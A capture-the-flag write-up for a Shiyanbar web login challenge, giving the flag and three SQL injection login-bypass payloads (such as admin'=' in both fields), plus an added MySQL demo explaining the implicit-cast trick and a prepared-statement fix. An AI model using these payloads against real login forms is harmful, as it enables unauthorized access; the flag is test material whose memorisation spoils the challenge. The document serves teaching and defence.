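Shiyanbar web challenge: "How about logging in?" (登陆一下好么)
Flag: ctf{51d1bf8fb65a8c2406513ee8f52283e7}
Solution steps:
1. Read the challenge hint: it says that all statements are filtered, so don't think along the lines of injection statements.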
![](https://img2018.cnblogs.com/blog/1785869/201909/1785869-20190912233521500-1079194171.jpg)
2. Inspect the page source; nothing stands out there. Try a "universal password":
Option 1: username: 1'='0 password: 1'='0
Option 2: username: what'=' password: what'='
Option 3: username: admin'=' password: admin'='
![](https://img2018.cnblogs.com/blog/1785869/201909/1785869-20190912233539415-1634847872.jpg)
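Why a value such as admin'=' passes a keyword filter, and what closes the hole, shown as an added MySQL example that is not part of the original write-up. The users table, its rows and the concatenated query shape are assumptions; the page does not show the challenge's backend.

```sql
-- Constructed table and rows (plaintext passwords only to keep the demo short).
CREATE TABLE users (username VARCHAR(32), password VARCHAR(32));
INSERT INTO users VALUES ('alice', 'alice-pw'), ('bob', 'bob-pw');

-- Assumed vulnerable pattern: form input concatenated into the statement text.
-- With username = password = admin'=' the server is sent:
SELECT username FROM users
WHERE username = 'admin'='' AND password = 'admin'='';
-- '=' is left-associative, so each condition parses as (col = 'admin') = ''.
--   col = 'admin' is 0 for every row whose value is not 'admin'.
--   0 = ''        compares a number with a string; MySQL casts '' to 0.
-- The condition therefore holds for rows that do NOT match 'admin',
-- and no keyword (OR, UNION, SELECT, comment marker) was needed.
-- A filter that only blocks keywords never sees anything to block.

-- The implicit string-to-number cast in isolation
-- (second column is the 1'='0 variant):
SELECT 0 = ''  AS empty_string_vs_zero,
       0 = '0' AS zero_string_vs_zero;

-- Hardened form: server-side prepared statement, input bound as data.
PREPARE login FROM
  'SELECT username FROM users WHERE username = ? AND password = ?';

-- The same input is now compared as the literal 7-character string admin'='
SET @u = 'admin''=''', @p = 'admin''=''';
EXECUTE login USING @u, @p;

-- A genuine credential pair still matches its own row.
SET @u = 'alice', @p = 'alice-pw';
EXECUTE login USING @u, @p;

DEALLOCATE PREPARE login;
```

Application code gets the same effect from its driver's parameter binding (for example PDO or mysqli prepared statements) instead of building the WHERE clause from strings.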
3. Retrieve the flag. It can be obtained through the MySQL database; work that part out yourself.
![](https://img2018.cnblogs.com/blog/1785869/201909/1785869-20190912233555761-402371714.jpg)